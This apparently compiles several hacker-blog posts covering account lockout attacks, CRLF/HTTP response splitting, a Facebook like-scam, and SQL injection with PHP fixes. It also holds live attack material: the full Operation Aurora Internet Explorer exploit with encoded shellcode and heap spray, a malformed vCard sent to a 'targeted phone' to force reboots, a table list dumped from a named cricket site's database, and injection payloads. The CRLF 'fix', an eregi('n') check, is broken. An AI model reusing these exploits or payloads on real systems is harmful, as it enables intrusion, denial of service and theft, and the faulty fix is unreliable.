Introduction:

First of all, “Account Lockout” is a security mechanism. It is also a subroutine. This mechanism uses on web application to Electronic gate-pass.

Account lockout is a good way to reduce risk. If a person makes an attempt with a bad password, after a certain number of bad attempts the account will get locked out. Many systems can unlock the account out after a certain amount of time.

Attack:

The account lockout attack is an attack on the client, not the server. It causes the victim’s account to be locked and unable to access it for a period of time causing disruption and if used at the right time can prove very effective. In an account lockout attack, the attacker attempts to lockout all user accounts, typically by failing login more times than the threshold defined by the authentication system. For example, if users are locked out of their accounts after three failed login attempts, an attacker can lock out their account for them simply by failing login three times. This attack can result in a large scale denial of service attack if all user accounts are locked out, especially if the amount of work required to reset the accounts is significant.

Who is the Target?

Sites that operate an account lockout feature depending on incorrect logins in a certain period of time are vulnerable. Note this only works when the system locks the username not the attempting IP address. As otherwise all you are doing is blocking your self out. Sites employ this lockout feature to prevent bruteforce attacks on passwords, an even more severe attack.

Methods of Attack:

• API Abuse
• Flooding
• Brute Force

Ways of Attack:

• First one, Hacker will submit wrong password to system according to targeted username until that account get locked.
• Second one, by editing the cookie, hacker will attempt one login, then find the cookie “logins_incorrect=1″ or similar, and change the value to 999, or any number above the limit. This data will then be sent back to the server and stored in the database so the user will be locked out everywhere.
• Third one, hacker could write a script to simultaneously lockout every username in the database, of course here he will need a username list but most forums and CMS’s have the memberlist ready to copy. This is most disruptive when performed at the company’s busiest times such as New-Year.

Procedure of a successful attack:

# First Phase:

• Analyze system documentation to find list of events that could potentially cause account lockout
• Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
• Determine another user’s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times or until the system provides an indication that the account is locked out.

#Second Phase:

• Obtain list of authorized users using another attack pattern, such as SQL Injection.
• Attempt to create accounts if possible; system should indicate if a user ID is already taken.
• Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

#Third Phase:

• For each user ID to be locked out, perform the lockout procedure discovered in the first step.

Solutions:

• Do not provide any indication to users that their accounts are locked out. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
• Avoid providing any indication regarding the validity of user IDs upon failed login attempts. Provide a simple error message such as: “Login failed. Try again or contact your administrator” regardless of why a login attempt fails.
• Build authentication mechanism, which will block account after N tries for a given IP address, from which log in attempt was conducted.
• To minimize possibility of blocking owner`s account we may take under consideration other characteristics like User-Agent or X_FORWARDED_FOR (if it’s present).
• Moreover after N login attempts, but before blocking the account, you may include additional verification by comparing data entered by the user and data displayed to him/her on the picture (CAPTCHA).

Conclusion:

• Needed Hacking skill or knowledge:         Low
• Risk of successful attack:                              High
• Result of attack:                                               Denial of Service

##Introduction:

After a long time, I am writing about a new thing, new thing cause I’ve learned it last night. Visited couple of sites from last night, and wondering that how I was in dark about “Carriage Return and Line Feed”.

##Description:

CRLF injection attacks are not as well known as some other attacks, but when used against vulnerable applications, CRLF injections can be just as effective and devastating .It is fairly simple, yet extremely powerful web attack.  Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks.  A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.

Link:  www.hackingspirits.com/vuln-rnd/adwords-crlf-injection.pdf

CRLF  is a very significant sequence of characters for programmers. These two special characters represent the End Of Line (EOL) marker for many Internet protocols, including, but not limited to MIME (e-mail), NNTP (newsgroups) and more importantly HTTP.  When programmers write code for web applications they split headers based on where the CRLF is found. If a malicious user is able to inject his own CRLF sequence into an HTTP stream, he is able to maliciously control the way a web application functions.

The essence of HTTP Response splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response, in the normal case. The first response may be partially controlled by the attacker, but this is less important. What is material is that the attacker completely controls the form of the second response from the HTTP status line to the last byte of the HTTP response body. Once this is possible, the attacker realizes the attack by sending two requests through the target. The first one invokes two responses from the web server, and the second request would typically be to some "innocent" resource on the web server. However, the second request would be matched, by the target, to the second HTTP response, which is fully controlled by the attacker. The attacker, therefore, tricks the target into believing that a particular resource on the web server (designated by the second request) is the server's HTTP response (server content), while it is in fact some data, which is forged by the attacker through the web server - this is the second response.

HTTP Response Splitting attacks take place where the server script embeds user data in HTTP response headers. This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.

In the first case, the redirection URL is part of the Location HTTP response header, and in the second cookie setting case, the cookie name/value is part of the Set-Cookie HTTP response header.

The essence of the attack is injecting CRs and LFs in such manner that a second HTTP message is formed where a single one was planned for by the application. CRLF injection is a method used for several other attacks which change the data of the single HTTP response send by the application, but in this case, the role of the CRLFs is slightly different - it is meant to terminate the first (planned) HTTP response message, and form another (totally crafted by the attacked, and totally unplanned by the application) HTTP response message (hence the name of the attack). This injection is possible if the application (that runs on top of the web server) embeds un-validated user data in a redirection, cookie setting, or any other manner that eventually causes user data to become part of the HTTP response headers.

With HTTP Response Splitting, it is possible to mount various kinds of attacks:

#Cross-User Defacement

An attacker can make a single request to a vulnerable server that will cause the sever to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.

In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application.

In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.

#Cache Poisoning

The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected.

#Cross-Site Scripting

Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser.

The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account.

#Page Hijacking

In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.

Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim.

##Proof-Of-Concept:

Header Injection:

Vulnerable document is “rdt.php”

Injected Header Data:

</p>
<p>%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E</p>
<p>

If the user follows the link, the HTTP request will look like:

</p>
<p>GET /rdt.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont color=red%3Ehey%3C/font%3E%3C/html%3E HTTP/1.1\r\n</p>
<p>Host: abc.org\r\n</p>
<p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n</p>
<p>Accept: text/xml,application/xml,application/xhtml xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n</p>
<p>Accept-Language: en-us,en;q=0.5\r\n</p>
<p>Accept-Encoding: gzip,deflate\r\n</p>
<p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n</p>
<p>Keep-Alive: 300\r\n</p>
<p>Connection: keep-alive\r\n</p>
<p>\r\n</p>
<p>

##Fix:

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to “$_POST['input']”

</p>
<p>if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable</p>
<p>{ //start if..</p>
<p>die(&quot;CRLF Attack Detected&quot;); //exit program if CRLF is found in the variable</p>
<p>} //end if..</p>
<p>

##Conclusion:

“Carriage Return and Line Feed” will be famous Attack Method for next generation. Because it not well-known to people. Everybody keeps eyes on SQLi or on XSS. But in upcoming times, it will hard to find a SQLi/XSS vulnerable site or Web-app.

## References:

**Web Sites

**Books

**Blogs

-

And once again, FB users are  helping FACEBOOK SPAMMERS without knowing themselves. A lot of  SHOCKING  information are posting on facebook news feed. Some days ago there was a hoax/spam called “Girl who killed herself”.

You may visit this link to get full information.

Graham Cluley’s blog

Today, I saw a post on my news feed about “SHOCKING Hidden Message in the Google Logo! You won’t believe this!”. It was lame but we all love to know THE SECRETs. Curiosity is a dangerous thing; it grows and gives mental pain. So, we need to satisfy ourselves anyhow. And make us a SPAM VICTIM.

Spam is the use of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. While the most widely recognized form of spam is e-mail spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social networking spam, television advertising and file sharing network spam.

Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, and it is difficult to hold senders accountable for their mass mailings. Because the barrier to entry is so low, spammers are numerous, and the volume of unsolicited mail has become very high. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have been forced to add extra capacity to cope with the deluge. Spamming is universally reviled, and has been the subject of legislation in many jurisdictions.

People who create electronic spam are called spammers.

Now I am going to demonstrate, what will happen after following that FB post.

Very intelligent page that uses familiar scam where they trick you into “liking” and “sharing” the link.

After clicking that LIKE button.

Now you have to share this page on your FB profile.

AND

Now visit your profile.

Back to page, HUH!! Survey….GOD, here is the trick.

Now reveal that google secret.[ ]

Truth about GOOGLE LOGO SECRET is here.

Google logo Secrect

Stop “liking” and “sharing” pages unless you really do like them. There are many scammers on Facebook trying to trick you into sharing their links with the promise of showing you some exclusive pictures or a video or secrets.

0×01: Introduction:

My younger brother suddenly informed me that, his phone got a problem. It takes Reboot when he wants to call a contact. He also said: “I was working with Digital V-Cards”.

0×02: Description:

**Normal V-Card that saves at SE phone contact.

BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8:;Unknown
FN;CHARSET=UTF-8:Unknown
TEL;CELL:+8801111112222
X-IRMC-LUID:00020000009A
END:VCARD

Take a close look at V-Card, there is a character set encoding system (UTF-8) at N (Name) and FN (Family Name).

Why that character encoding used there? Cause SE supports many types of special symbols to write contact name on phone memory. Also it is a multilingual handset.

UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. It is able to represent any character in the Unicode standard, yet is backwards compatible with ASCII. For these reasons, it is steadily becoming the preferred encoding for e-mail, web pages, and other places where characters are stored or streamed.
UTF-8 encodes each character (code point) in 1 to 4 octets (8-bit bytes), with the single–octet encoding used only for the 128 US-ASCII characters.

0×03 Ideas:

1. Let use some special symbols in Contact name (V-Card).
2. Why not, we can set encoded data in CELL number (V-Card).
3. Hopefully SE developers never thought that user can set their V-Card Manually. And hopefully their decoding mechanism does not prepare to decode the CELL numbers.

0×04: Ideas execution:

Let see another V-Card that uses special symbols.

BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Unknown...=C2=A3
FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown...=C2=A3
TEL;CELL: +8801111112222
X-IRMC-LUID:000200000001
END:VCARD

It works perfectly.

0×05: Exploit:

Successfully exploited V-Card.

BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:V=01;Unknown
FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown V=01
TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:0000000000000000000000000000000=
0000000000000000000000000000000000000000000000000=EB=BA=BA
X-IRMC-LUID:00020000001F
END:VCARD

0×06: Attack Method:

1. Save this exploited V-Card.
2. Send this V-Card to targeted phone via Bluetooth from your computer or phone.

0×07: Effect:

Phone will take force reboot if victim want to DELETE, EDIT, CALL and VIEW that V-Card.

0×08: References:

1. The WiKipedia
2. SE Manual.

0×09: Credits:

a. Shakil Mirza.
b. Shahee Mirza.

0×10: Conclusion:

I think there is a vulnerability on Sony Ericsson handset’s Bluetooth. Multi-request and too much DATA flow may causes DoS.

Only Table List here:

——————————————————————
fixtures
lm_data
lm_hotels
lm_rooms
lm_venues
players_workload
slideshow
tbl_accreditation
tbl_ads
tbl_article_video_keywords
tbl_background
tbl_bb_comments
tbl_bb_invites
tbl_bb_invites_data
tbl_bb_invites_text
tbl_bb_invites_tickets
tbl_bb_users
tbl_camerafan
tbl_cloud
tbl_coaching_staff
tbl_comments
tbl_contacts
tbl_dugout
tbl_features
tbl_feed_live_match
tbl_feed_match
tbl_feed_match_innings
tbl_feed_match_innings_ballbyball
tbl_feed_match_innings_batting
tbl_feed_match_innings_bowling
tbl_feed_match_teams
tbl_feed_match_teams_players
tbl_feed_match_umpire
tbl_feed_running
tbl_files
tbl_gallery
tbl_gallery_images
tbl_governingbody
tbl_home_gallery
tbl_homepage
tbl_interviews
tbl_iplteams
tbl_lm_friendinvites
tbl_main_panel_news
tbl_main_panel_now
tbl_main_panel_videos
tbl_master_slave
tbl_matches
tbl_news
tbl_pages
tbl_panel_left
tbl_player_profile
tbl_player_profile_new
tbl_player_stats
tbl_poll_results
tbl_polls_answer_options
tbl_polls_question
tbl_rating
tbl_rs_invites
tbl_rs_invites_text
tbl_teams
tbl_tickets
tbl_trivia
tbl_tv
tbl_user_subscription
tbl_venues
tbl_videos
tbl_wallpaper
tbl_weather
tbladminusers
tblsession
tbluserlogs
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
——————————————————————
******
Notification sent to info-iplt20 [at] iplt20.com
******

The buzzed news hit earlier this week that the attack vector that allowed bad actors presumably from China into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use after free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8 but only used by attackers on IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.

This attack got a name, “Operation Aurora”. And everybody interested to know how it done a successful attacks into corporate.

Ok, no more talk…. Here is the “EXPLOIT CODE”.

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%
ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
  );
  cc = cc.replace(/@/g, ",");
  eval(cc);
  var x1 = new Array();
  for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
  }
  ;
  var e1 = null;
  function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
  }
  function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
  }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

Better if you download it from here.

Microsoft says:

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.”

Cricinfo.com is the finest and most famous web portal for cricket. Cricinfo offers users the most comprehensive live coverage of international and domestic cricket available as well as an unparalleled stats database, quality editorial comment and analysis and is part of ESPN. We get lot of information from there. Such people like me, who have not any television at home keeps eyes on it.

00×02: Poc

I have tried to inject iframe on it. Proof of concept is below.

00×03: Details

Vulnerable URL is below.

00×04: Greetings

Red-D3v1L ## Who discovered XSS vulnerability on “Cricinfo Games 1.0″.

00×05: Credit

SHAHEE MIRZA

This is awesome that attackers are using several methods to get into some restricted part of web applications. They are discovering new methods day by day.

But SQL injection is now widely spreading method to hack your web sites or web apps.

So here is the question, what is SQL injection?

## SQL injection is a code injection technique that helps attacker to get some vulnerable information from your database. Actually it happens on database layer. This vulnerability occurs on PHP and ASP scripts for mistake of its coder.

***Where and why this vulnerability happens:

## Your coder may forget or lazy to handle SQL query errors.

## Where malicious users can insert SQL syntax on form requests.

## Forget to filter SQL syntax.

## Can not determine type of SQL query string.

## This attack can be perform on anywhere of your application, even attacker don’t have to get a privileged account.

## Attack can be performing via cookie.

## Those dynamic pages which only pulls data from database directly.

## This vulnerability may be causes by your database server also.

***Types of SQL injection:

There are two types of SQL injection.

1.Injection into the variables that contain strings.

2.Injection into numeric variables.

Both are different than each other. I will describe about both and also how to avoid them.

*** 1. Injection into the variables that contain strings.

## Vulnerable code:

OK, just imagine that you wrote an application that have a page that fetches member’s credits according to his login name. The username will gone one page to another via URL, actually method of $_ GET [‘variable’];

$cred = $_GET['name'];

$result = mysql_query("SELECT credit FROM user WHERE username='$cred'");

This script has SQL injection vulnerability. An attacker can abuse it, just putting a SQL query beside the username in URL.

‘ UNION SELECT password FROM admin WHERE id=1

This will pull password of an admin user who has id number 1 as an example.

## Solution:

To avoid this type of attack is very simple. So many times it has been described by so many security experts. You have to use a function mysql_real_escape_string().What does it do? mysql_real_escape_string() function adds “\”  to following characters:

NULL, \ x00, \ n, \ r, \, ', " and \ X1A

So, look out that vulnerable code with mysql_real_escape_string() .

//

$cred = mysql_real_escape_string( $_GET['name']);

$result = mysql_query("SELECT credit FROM user WHERE username='$cred'");

This page is completely secure now.

## Attack again:

Now an attacker will attack on it like before.

‘ UNION SELECT password FROM admin WHERE id=1

But after using  mysql_real_escape_string() funtion, this query looks like this.

\’ UNION SELECT password FROM admin WHERE  id=1

There is “\” character just added because of mysql_real_escape_string().

Somebody will advice you to use addslashes() function. But this function has some limitations.

##Please read these topics from PHP manual:

http://www.php.net/manual/en/function.addslashes.php

and

http://www.php.net/manual/en/mysqli.real-escape-string.php

and also.

http://www.php.net/manual/en/function.pg-escape-string.php

*** 2. Injection into numeric variables.

These types of SQL attacks are less know than first one. And not so well described by security experts. But it also comes with same disaster on your web applications.

## Vulnerable code:

Now time to describe this attack. Imagine again, you wrote a page that will display user’s credit according to his user id. The user id will gone one page to another via form posting, actually method of $_ POST [‘variable’];

$id = $_POST['id'];

$result = mysql_query("SELECT credit FROM user WHERE id=$id");

On this situation mysql_real_escape_string() will not protect you from SQL injection attack. Because now the $id variable is not quoted. This variable is containing numerical value. Now an attacker will use this type of SQL query.

2 UNION SELECT password FROM admin WHERE id=1

So, how could you protect web application from this attack? There are two things you can do.

1. You can change content to number, so that your variable will hold only numerical content.

2. You can check if the content is numerical then it may proceed to make a query.

## Solution:

To avoid this type of attack you can use these functions.

A. intval() function.

B. is_numeric() function.

Here I am describing about the benefit of intval() function.

//

//

$var='7ack3r'; //variable contain alphanumerical content

$var2=intval($var); // filtered by intval()

print $var2; // this will print only 7

Now you can change your code as like below.

$id = intval($_POST['id']);

$result = mysql_query("SELECT credit FROM user WHERE id=$id");

Yap, you have done your job. This will secure your web applications more than enough.

Now, I am going to describe the function name is_numeric().This function will check, is your variable contains a numerical content?

$id = $_POST['id'];

if (is_numeric($id))

{

$result = mysql_query("SELECT credit FROM user WHERE id=$id");

}

else

{

log_the_attack(); //this function will log all the information eg: ip, browser, time, date etc

echo "Ha ha ha, trying do something with me dude? You are logged honey";

}

function log_the_attack()

{

// bla bla bla

}

Here a question will arise that “What can I do now, what will use…. Intval() or is_numeric() ?”

Answer will be “Its up to you, intval() is easy and saves the coding time but is_numeric() may kills some time. But this will help you to keep all the attack logs”.

Please read details from here:

1. http://www.php.net/manual/en/function.is-numeric.php

2. http://www.php.net/manual/en/function.intval.php

*** Conclusions:

Finally I am going finish this article. If you follow these steps, your application will be secure.

## Verify data types of all non-string user inputs.

## Escape all string inputs.

## Keep track of security violation attempts.

## Limit SQL user rights.

## Take database backups.

## Double check your codes.

## Always keep updated your database server.

###################

I AM CONFESSING THAT, I AM BAD IN ENGLISH.

IF I WROTE ANY WRONG INFORMATION IN MY ARTICLE, PLEASE INFORM ME .

###################